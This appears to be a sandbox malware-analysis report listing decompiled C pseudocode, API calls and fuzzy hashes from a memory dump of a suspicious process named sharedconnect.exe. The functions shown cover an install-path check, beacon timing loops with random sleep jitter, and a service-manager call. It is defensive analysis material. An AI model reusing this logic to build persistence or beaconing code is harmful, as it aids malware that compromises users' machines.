Opcode Fuzzy Hash: f531f9be2d2586d60c6a9c2dfe806ef5a6925ef3d312cc41d05f3ca52cdf3f6b
Instruction Fuzzy Hash: E5D0123051010315E91033BB492871E39645F349CBF30001F9713D2174FE74C001D132

Uniqueness

Uniqueness Score: -1.00%

Function 014874D0, Relevance: 3.1, APIs: 2, Instructions: 60
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E014874D0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				void* _t2;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t15;
				long _t17;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t30;

				_t30 = __eflags;
				_t24 = __esi;
				_t23 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				L014870F0(__ecx); // executed
				_t2 = E014872E0(_t30);
				if(_t2 != 0) {
					if(L01486C30(_t2) == 0) {
						L17:
						return CloseHandle( *0x148a82c);
					}
					_t5 = L01486DC0(_t3); // executed
					if(_t5 == 0 || L01486E30(_t5) == 0) {
						goto L17;
					} else {
						_t7 = L01486EA0(_t6); // executed
						if(_t7 == 0) {
							goto L17;
						}
						_t8 = L01486F10(_t7); // executed
						if(_t8 == 0) {
							goto L17;
						}
						_t9 = L01486F80(_t8); // executed
						if(_t9 == 0) {
							goto L17;
						}
						_t10 = L01487050(_t9); // executed
						if(_t10 == 0) {
							goto L17;
						}
						if(E014882D0(__ebx, _t22, __esi) != 0 || E01486990(_t20) == 0) {
							L16:
							E014870D0();
							goto L17;
						} else {
							_push(_t20);
							_t21 = L014884F0(_t13);
							_t15 = E01488780(_t14);
							_t41 = _t15;
							if(_t15 == 0) {
								L15:
								L014869E0(_t15);
								goto L16;
							}
							do {
								_t17 = L01487370(_t41); // executed
							} while (_t17 == 0 || WaitForSingleObject( *0x148a82c, _t17) == 0x102);
							_t15 = E014888B0(_t18, _t21, _t23, _t24);
							goto L15;
						}
					}
				}
				return _t2;
			}

0x014874d0
0x014874d0
0x014874d0
0x014874d0
0x014874d0
0x014874d6
0x014874db
0x014874e2
0x014874ef
0x0148758c
0x00000000
0x01487592
0x014874f5
0x014874fc
0x00000000
0x0148750f
0x0148750f
0x01487516
0x00000000
0x00000000
0x01487518
0x0148751f
0x00000000
0x00000000
0x01487521
0x01487528
0x00000000
0x00000000
0x0148752a
0x01487531
0x00000000
0x00000000
0x0148753a
0x01487587
0x01487587
0x00000000
0x0148754b
0x0148754b
0x01487551
0x01487553
0x0148755b
0x0148755d
0x01487582
0x01487582
0x00000000
0x01487582
0x01487560
0x01487560
0x01487565
0x0148757d
0x00000000
0x0148757d
0x0148753a
0x014874fc
0x0148759b

APIs

Part of subcall function 014872E0: WaitForSingleObject.KERNEL32(00000000,?,014874E0,?,01487B68), ref: 014872F3
Part of subcall function 014872E0: SignalObjectAndWait.KERNEL32(000000FF,00000000,?,014874E0,?,01487B68), ref: 01487326
Part of subcall function 014872E0: ResetEvent.KERNEL32(?,014874E0,?,01487B68), ref: 0148733D
Part of subcall function 014872E0: ReleaseMutex.KERNEL32(?,014874E0,?,01487B68), ref: 0148734B
Part of subcall function 014872E0: CloseHandle.KERNEL32(?,014874E0,?,01487B68), ref: 01487357

CloseHandle.KERNEL32(?,01487B68), ref: 01487592

Part of subcall function 014882D0: lstrcmpiW.KERNEL32(0148AFC8,C:\Windows\SysWOW64\sharedconnect.exe,?,01487538,?,01487B68), ref: 014882FE

WaitForSingleObject.KERNEL32(00000000), ref: 01487570

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: ObjectWait$CloseHandleSingle$EventMutexReleaseResetSignallstrcmpi
String ID:
API String ID: 762247096-0
Opcode ID: 0f9d67a41894561f27a0625934145b8de4cb3728546b2ffb7adb8640526d6f82
Instruction ID: 464f62a0e8bdbe1af1b5e01848c3e8194bbbd4720b0a21b0b81bc3bdb9880ae3
Opcode Fuzzy Hash: 0f9d67a41894561f27a0625934145b8de4cb3728546b2ffb7adb8640526d6f82
Instruction Fuzzy Hash: 2D01D0A161028702FB6133FB6E3522F39998E70186F79096FDF15C2AB5FE39D010A576

Uniqueness

Uniqueness Score: -1.00%

Function 01487379, Relevance: 3.0, APIs: 2, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E01487379(void* __eflags) {
				void* _t36;
				void* _t38;
				intOrPtr _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				void* _t51;
				signed int _t52;
				signed int _t54;
				signed char _t61;
				intOrPtr _t82;
				void* _t84;
				void* _t87;

				_t5 = GetTickCount() % 0x9c40 + 0xd1f60; // 0xd1f60
				_t84 = _t5;
				_t82 = L014884F0(_t33 / 0x9c40); // executed
				_t36 = L01482530(_t87 - 0x34); // executed
				if(_t36 == 0) {
					L22:
					return _t84;
				} else {
					_t38 = E014887A0(_t87 - 0x2c, _t84);
					_t94 = _t38;
					if(_t38 == 0) {
						L21:
						E014818C0( *((intOrPtr*)(_t87 - 0x34)));
						goto L22;
					} else {
						_t61 =  *0x148a890; // 0x0
						 *(_t87 - 0x4c) = _t61;
						 *((intOrPtr*)(_t87 - 0x48)) = _t82;
						 *((intOrPtr*)(_t87 - 0x44)) =  *0x148a6d0(_t82);
						_t41 = L01482610(_t40); // executed
						 *((intOrPtr*)(_t87 - 0x40)) = _t41;
						 *((intOrPtr*)(_t87 - 0x3c)) = E01482010();
						_t43 = E014884E0();
						_t77 = _t87 - 0x4c;
						 *((intOrPtr*)(_t87 - 0x38)) = _t43;
						_t66 = _t87 - 0x10;
						_t44 = L01487600(_t87 - 0x10, _t87 - 0x4c, _t94);
						_t95 = _t44;
						if(_t44 == 0) {
							L20:
							E014818C0( *((intOrPtr*)(_t87 - 0x2c)));
							goto L21;
						} else {
							goto 0x1491770;
							asm("int3");
							asm("aam 0xcd");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3"); // executed
							_t46 = L014869F0(_t84, _t95); // executed
							if(_t46 == 0) {
								_t26 = GetTickCount() % 0x2328;
								__eflags = _t26;
								_t29 = _t26 + 0x3e8; // 0x3e8
								_t84 = _t29;
								E01486B80(0x148a870);
								goto L19;
							} else {
								_t51 = L01481030();
								if(_t51 != 0) {
									__eflags = _t61 & 0x00000003;
									if(__eflags == 0) {
										L01488390(_t51, _t66, _t82);
									}
									goto 0x149179f;
									asm("int3");
									_t52 = L014876B0(_t61, _t66, _t77, __eflags);
									__eflags = _t52;
									if(_t52 == 0) {
										L17:
										E014818C0( *((intOrPtr*)(_t87 - 8)));
									} else {
										_t54 =  *(_t87 - 0x24);
										__eflags = _t54;
										if(_t54 != 0) {
											__eflags = _t54 - 1;
											_t84 =  ==  ? 0xea60 : _t84;
											goto L17;
										} else {
											E014888A0(_t82);
											_t80 =  *(_t87 - 0x1c);
											__eflags =  *(_t87 - 0x1c);
											if(__eflags != 0) {
												L01488340( *((intOrPtr*)(_t87 - 0x20)), _t80, __eflags);
											}
											__eflags =  *(_t87 - 0x14);
											if(__eflags == 0) {
												goto L17;
											} else {
												L01488810( *((intOrPtr*)(_t87 - 0x18)), _t84, __eflags);
												_t84 = 0;
												E014818C0( *((intOrPtr*)(_t87 - 8)));
											}
										}
									}
									L19:
									E014818C0( *((intOrPtr*)(_t87 - 0x10)));
									goto L20;
								} else {
									goto 0x149178b;
									asm("int3");
									return _t51;
								}
							}
						}
					}
				}
			}

0x01487388
0x01487388
0x01487396
0x01487398
0x0148739f
0x014874ba
0x014874c2
0x014873a5
0x014873a8
0x014873ad
0x014873af
0x014874b2
0x014874b5
0x00000000
0x014873b5
0x014873b5
0x014873bc
0x014873bf
0x014873c8
0x014873cb
0x014873d0
0x014873d8
0x014873db
0x014873e0
0x014873e3
0x014873e6
0x014873e9
0x014873ee
0x014873f0
0x014874aa
0x014874ad
0x00000000
0x014873f6
0x014873f6
0x014873fb
0x014873fc
0x014873fe
0x014873ff
0x01487400
0x01487401
0x01487402
0x01487403
0x0148740d
0x01487490
0x01487490
0x01487497
0x01487497
0x0148749d
0x00000000
0x0148740f
0x0148740f
0x01487416
0x0148741f
0x01487422
0x01487424
0x01487424
0x01487429
0x0148742e
0x0148742f
0x01487434
0x01487436
0x01487479
0x0148747c
0x01487438
0x01487438
0x0148743b
0x0148743d
0x0148746e
0x01487476
0x00000000
0x0148743f
0x0148743f
0x01487444
0x01487447
0x01487449
0x0148744e
0x0148744e
0x01487456
0x01487458
0x00000000
0x0148745a
0x0148745d
0x01487465
0x01487467
0x01487467
0x01487458
0x0148743d
0x014874a2
0x014874a5
0x00000000
0x01487418
0x01487418
0x0148741d
0x0148741e
0x0148741e
0x01487416
0x0148740d
0x014873f0
0x014873af

APIs

GetTickCount.KERNEL32 ref: 01487379
lstrlen.KERNEL32(00000000), ref: 014873C2

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CountTicklstrlen
String ID:
API String ID: 2992449761-0
Opcode ID: bb409d2524e6a8b865b6f51b5cf1ac78f06d71e689e675e5a732b912def1776e
Instruction ID: 5eb99591061f4b0dba16543e7e64f025cd3aaeb5b38fcf031522e2eadd17afee
Opcode Fuzzy Hash: bb409d2524e6a8b865b6f51b5cf1ac78f06d71e689e675e5a732b912def1776e
Instruction Fuzzy Hash: AD012931E002068BDB14FFAAE8504EEFBB1BF64690B60443FC905A7260EB749806CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014882D0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 23
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E014882D0(void* __ebx, void* __edx, void* __esi) {
				void* __ecx;
				intOrPtr _t1;
				void* _t3;
				int _t7;
				void* _t14;
				void* _t15;
				void* _t16;

				_t16 = __esi;
				_t15 = __edx;
				_t1 =  *0x148a830; // 0xaf72bc4a
				 *0x148a844 = _t1;
				L01487BA0();
				_t3 = L01487B80(); // executed
				L01487D00(_t3, __ebx, _t14); // executed
				L01487E10(L01487D80());
				_t7 = lstrcmpiW(0x148afc8, "C:\Windows\SysWOW64\sharedconnect.exe");
				if(_t7 != 0) {
					L01488030(_t14, _t15, _t16);
					if( *0x148a840 == 0) {
						goto 0x1491bb5;
						asm("int3");
						asm("int3");
						asm("aam 0xcd");
						L01481E60(_t16);
						return 1;
					} else {
						L01488130();
						return 1;
					}
				} else {
					return _t7;
				}
			}

0x014882d0
0x014882d0
0x014882d1
0x014882d6
0x014882db
0x014882e0
0x014882e5
0x014882ef
0x014882fe
0x01488306
0x0148830a
0x01488316
0x01488324
0x01488329
0x0148832a
0x0148832b
0x0148832d
0x0148833b
0x01488318
0x01488318
0x01488323
0x01488323
0x01488309
0x01488309
0x01488309

APIs

lstrcmpiW.KERNEL32(0148AFC8,C:\Windows\SysWOW64\sharedconnect.exe,?,01487538,?,01487B68), ref: 014882FE

Strings

C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 014882F4

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: C:\Windows\SysWOW64\sharedconnect.exe
API String ID: 1586166983-3666525999
Opcode ID: 53a5789cc0f50d7c32d55ab8c7822aaccfce9bc7712b599a4b5663d636c46256
Instruction ID: 1d457b623e37f137a499c0225823a3019f5d12ad3a256347e040be2d884a282f
Opcode Fuzzy Hash: 53a5789cc0f50d7c32d55ab8c7822aaccfce9bc7712b599a4b5663d636c46256
Instruction Fuzzy Hash: C9E04F7022210396C6207BFAA46471E31D0AB30653F70050FE012431B4DABD50429322

Uniqueness

Uniqueness Score: -1.00%

Function 0148261F, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL ref: 0148262A
GetNativeSystemInfo.KERNELBASE(?), ref: 01482634

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: 72d0544419666830c7c5e4edbb8dd49879ae67497883f434d970a7794f2a81be
Instruction ID: 7069abcd27ddb208a54a8a33b9b3ea8ddc06a060459aec808b442ead76377cbf
Opcode Fuzzy Hash: 72d0544419666830c7c5e4edbb8dd49879ae67497883f434d970a7794f2a81be
Instruction Fuzzy Hash: 18E0ED7190021E8BCB24DB51D8559ECB7B8EB25305F0100EAE649F6165E635DB54CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01487DAE, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE ref: 01487DAE
CloseHandle.KERNEL32 ref: 01487DF8

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandleMapping
String ID:
API String ID: 3834335185-0
Opcode ID: e55c1fe8a91cea814df4e76a4afc9d97b627e2aa0817413153bcf1da45ff56c8
Instruction ID: 9eea7f51fcc60ac1ebb5bc14eb4e6651f7416d7eb69c5a29854333e2e411e21d
Opcode Fuzzy Hash: e55c1fe8a91cea814df4e76a4afc9d97b627e2aa0817413153bcf1da45ff56c8
Instruction Fuzzy Hash: 74B09B3B104911DF4751395C71185DD7B76DBC45323354117EE13832289F70C4435651

Uniqueness

Uniqueness Score: -1.00%

Function 01482886, Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01482886(signed int __eax) {
				long _t3;
				void* _t5;
				void* _t6;

				_t3 = __eax *  *(_t6 + 0x10);
				_t5 = RtlAllocateHeap(GetProcessHeap(), 8, _t3); // executed
				return _t5;
			}

0x01482886
0x01482894
0x0148289b

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0148288D
RtlAllocateHeap.NTDLL(00000000), ref: 01482894

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: ec74bbe56a702cf8aeda02041530a3814f050e6d8943c338ccb23c4e0458f681
Instruction ID: 3d26e0ed2dde8a1f4f250259d5816806d0f1daa144d353e153c6f52fb4567e0d
Opcode Fuzzy Hash: ec74bbe56a702cf8aeda02041530a3814f050e6d8943c338ccb23c4e0458f681
Instruction Fuzzy Hash: 5BB092B2040205AFEB10AFE0A80DA6E3B2CFB8C205F10840AB75EC6068CBB190208B20

Uniqueness

Uniqueness Score: -1.00%

Function 01487BA9, Relevance: 3.0, APIs: 2, Instructions: 7serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 01487BA9
CloseServiceHandle.ADVAPI32(00000000), ref: 01487BBE

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CloseHandleManagerOpenService
String ID:
API String ID: 1199824460-0
Opcode ID: 9f6c7e6b64367dfe3cf8bfc9845f74f36807191cc828940482135f4dc06d8446
Instruction ID: b4ab82cc74747bbb0930f8e09bd5c5ff78feea184bd1bccf7271b2ec3bc0bc9e
Opcode Fuzzy Hash: 9f6c7e6b64367dfe3cf8bfc9845f74f36807191cc828940482135f4dc06d8446
Instruction Fuzzy Hash: 43B09BB01001005FDF705F25951C74F3EA4778030DB24424EE249D226CC7F44005C720

Uniqueness

Uniqueness Score: -1.00%

Function 01481850, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01481850(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}

0x0148185a
0x01481860

APIs

GetProcessHeap.KERNEL32(00000008,-00000040,0148107F), ref: 01481853
RtlAllocateHeap.NTDLL(00000000), ref: 0148185A

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: a44852f023b9a84ff2870a1270353f8856f3c7da09bef95c593a71782ec8a80a
Instruction ID: 19197b48f19f3cfdf7b685f5669e074e180936d79a661e7af0360b42b043b351
Opcode Fuzzy Hash: a44852f023b9a84ff2870a1270353f8856f3c7da09bef95c593a71782ec8a80a
Instruction Fuzzy Hash: C0A012B04002005FEE1027F0980DA0D3528E788301F1081097346820589AE050008720

Uniqueness

Uniqueness Score: -1.00%

Function 014818C0, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E014818C0(void* __ecx) {
				char _t2;

				_t2 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}

0x014818ca
0x014818d0

APIs

GetProcessHeap.KERNEL32(00000000,?,014810E3), ref: 014818C3
RtlFreeHeap.NTDLL(00000000), ref: 014818CA

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 8f77f3e6b02ac341d78394f5c956c3aa109aa1bb88d10abe4c8adf7444dee22d
Instruction ID: 916b6c55d61c5937666dfc737ec143f5269ef7a03bc6b5998c7e4411f1068aef
Opcode Fuzzy Hash: 8f77f3e6b02ac341d78394f5c956c3aa109aa1bb88d10abe4c8adf7444dee22d
Instruction Fuzzy Hash: 09A002715547005BED5477B09D1DB1D3538D748702F144549B3178615496E594009721

Uniqueness

Uniqueness Score: -1.00%

Function 014828A8, Relevance: 3.0, APIs: 2, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E014828A8() {
				char _t2;

				_t2 = RtlFreeHeap(GetProcessHeap()); // executed
				return _t2;
			}

0x014828af
0x014828b6

APIs

GetProcessHeap.KERNEL32 ref: 014828A8
RtlFreeHeap.NTDLL(00000000), ref: 014828AF

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: b357c5a7696c9fd1478d920ad5c3fc784003361af6327011fd47c4860a5a0831
Instruction ID: c5ced328e4a643c39e48b38142e232e89ed492a924ae966685a100e4ebe0a35f
Opcode Fuzzy Hash: b357c5a7696c9fd1478d920ad5c3fc784003361af6327011fd47c4860a5a0831
Instruction Fuzzy Hash: 07A001724406049B9A203AB0B90C55D7A38E74C216324844AB21B824298BB68010AB10

Uniqueness

Uniqueness Score: -1.00%

Function 01486A66, Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E01486A66(intOrPtr* __ebx, signed int* __edi, void* __esi) {
				void* _t41;
				void* _t52;
				intOrPtr _t58;
				signed int _t60;
				intOrPtr* _t61;
				void* _t64;
				signed char* _t68;
				void* _t76;
				signed int* _t82;
				void* _t85;
				void* _t88;
				void* _t100;

				_t85 = __esi;
				_t82 = __edi;
				_t61 = __ebx;
				if(L01486BD0(_t64, _t76, _t100) != 0) {
					_push(_t88 - 0x20);
					_t41 = L014822A0(_t85, _t88 - 0x3c); // executed
					if(_t41 != 0) {
						_t68 =  *(_t85 + 0x14);
						 *0x148a7cc(_t88 - 0xc8, 0x40, _t88 - 0x18, _t68[3] & 0x000000ff, _t68[2] & 0x000000ff, _t68[1] & 0x000000ff,  *_t68 & 0x000000ff);
						_push(_t88 - 0x44);
						_push( *((intOrPtr*)(_t88 - 0x1c)));
						_push( *((intOrPtr*)(_t88 - 0x20)));
						_t52 = L01481770(_t88 - 0xc8, ( *(_t85 + 0x14))[4]); // executed
						if(_t52 != 0) {
							_push(_t88 - 0x28);
							if(L01482390(_t85, _t88 - 0x44) != 0) {
								_t74 =  *((intOrPtr*)(_t88 - 0x28));
								_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x28))));
								 *_t61 = _t58;
								if(_t58 < 0x4000000) {
									_push(_t61);
									_t60 = L01486940(_t74 + 4,  *((intOrPtr*)(_t88 - 0x24)) - 4, _t82);
									_t74 =  *((intOrPtr*)(_t88 - 0x28));
									 *_t82 = _t60;
								}
								E014818C0(_t74);
							}
							E014818C0( *((intOrPtr*)(_t88 - 0x44)));
						}
						E014818C0(0);
						E014818C0( *((intOrPtr*)(_t88 - 0x20)));
					}
					E014818C0( *((intOrPtr*)(_t88 - 0x3c)));
				}
				E014818C0( *((intOrPtr*)(_t88 - 0x30)));
				if( *_t82 == 0) {
					 *((intOrPtr*)(_t85 + 0x1c)) =  *((intOrPtr*)(_t85 + 0x1c)) + 1;
					__eflags =  *_t82;
					_t33 =  *_t82 != 0;
					__eflags = _t33;
					return 0 | _t33;
				} else {
					 *((intOrPtr*)(_t85 + 0x20)) =  *((intOrPtr*)(_t85 + 0x20)) + 1;
					 *((intOrPtr*)(_t85 + 0x1c)) = 0;
					return 0 |  *_t82 != 0x00000000;
				}
			}

0x01486a66
0x01486a66
0x01486a66
0x01486a6d
0x01486a78
0x01486a7c
0x01486a86
0x01486a8c
0x01486aaf
0x01486ac1
0x01486ac2
0x01486ac8
0x01486ad2
0x01486adc
0x01486ae3
0x01486af1
0x01486af3
0x01486af6
0x01486af8
0x01486aff
0x01486b07
0x01486b0b
0x01486b10
0x01486b16
0x01486b16
0x01486b18
0x01486b18
0x01486b20
0x01486b20
0x01486b27
0x01486b2f
0x01486b2f
0x01486b37
0x01486b37
0x01486b3f
0x01486b47
0x01486b61
0x01486b66
0x01486b6a
0x01486b6a
0x01486b71
0x01486b49
0x01486b49
0x01486b4e
0x01486b60
0x01486b60

APIs

_snwprintf.NTDLL ref: 01486AAF

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID:
API String ID: 3988819677-0
Opcode ID: 4cbb4ef9d5146216ac5b4975775a899dbeef917eec101b49342aa7be73d4cb93
Instruction ID: 2648789bb68ac54713ff080fde50299cdc41e4e2297a3c8073ab4e48c27a11fb
Opcode Fuzzy Hash: 4cbb4ef9d5146216ac5b4975775a899dbeef917eec101b49342aa7be73d4cb93
Instruction Fuzzy Hash: BB31D171A001168FDB50FBA9D841AEFBBF8EF18354F04456BD506E7261EB31E919CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 014873FC, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E014873FC(signed char __ebx, void* __ecx, void* __esi, void* __eflags) {
				void* _t18;
				void* _t26;
				signed int _t27;
				signed int _t29;
				signed char _t35;
				void* _t37;
				void* _t47;
				void* _t52;
				void* _t54;
				void* _t57;

				_t54 = __esi;
				_t37 = __ecx;
				_t35 = __ebx;
				asm("aam 0xcd");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3"); // executed
				_t18 = L014869F0(__esi, __eflags); // executed
				if(_t18 == 0) {
					_t11 = GetTickCount() % 0x2328;
					__eflags = _t11;
					_t14 = _t11 + 0x3e8; // 0x3e8
					_t54 = _t14;
					E01486B80(0x148a870);
					goto L15;
				} else {
					_t26 = L01481030();
					if(_t26 != 0) {
						__eflags = _t35 & 0x00000003;
						if(__eflags == 0) {
							L01488390(_t26, _t37, _t52);
						}
						goto 0x149179f;
						asm("int3");
						_t27 = L014876B0(_t35, _t37, _t47, __eflags);
						__eflags = _t27;
						if(_t27 == 0) {
							L13:
							E014818C0( *((intOrPtr*)(_t57 - 8)));
						} else {
							_t29 =  *(_t57 - 0x24);
							__eflags = _t29;
							if(_t29 != 0) {
								__eflags = _t29 - 1;
								_t54 =  ==  ? 0xea60 : _t54;
								goto L13;
							} else {
								E014888A0(_t52);
								_t50 =  *(_t57 - 0x1c);
								__eflags =  *(_t57 - 0x1c);
								if(__eflags != 0) {
									L01488340( *((intOrPtr*)(_t57 - 0x20)), _t50, __eflags);
								}
								__eflags =  *(_t57 - 0x14);
								if(__eflags == 0) {
									goto L13;
								} else {
									L01488810( *((intOrPtr*)(_t57 - 0x18)), _t54, __eflags);
									_t54 = 0;
									E014818C0( *((intOrPtr*)(_t57 - 8)));
								}
							}
						}
						L15:
						E014818C0( *((intOrPtr*)(_t57 - 0x10)));
						E014818C0( *((intOrPtr*)(_t57 - 0x2c)));
						E014818C0( *((intOrPtr*)(_t57 - 0x34)));
						return _t54;
					} else {
						goto 0x149178b;
						asm("int3");
						return _t26;
					}
				}
			}

0x014873fc
0x014873fc
0x014873fc
0x014873fc
0x014873fe
0x014873ff
0x01487400
0x01487401
0x01487402
0x01487403
0x0148740d
0x01487490
0x01487490
0x01487497
0x01487497
0x0148749d
0x00000000
0x0148740f
0x0148740f
0x01487416
0x0148741f
0x01487422
0x01487424
0x01487424
0x01487429
0x0148742e
0x0148742f
0x01487434
0x01487436
0x01487479
0x0148747c
0x01487438
0x01487438
0x0148743b
0x0148743d
0x0148746e
0x01487476
0x00000000
0x0148743f
0x0148743f
0x01487444
0x01487447
0x01487449
0x0148744e
0x0148744e
0x01487456
0x01487458
0x00000000
0x0148745a
0x0148745d
0x01487465
0x01487467
0x01487467
0x01487458
0x0148743d
0x014874a2
0x014874a5
0x014874ad
0x014874b5
0x014874c2
0x01487418
0x01487418
0x0148741d
0x0148741e
0x0148741e
0x01487416

APIs

GetTickCount.KERNEL32 ref: 01487483

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
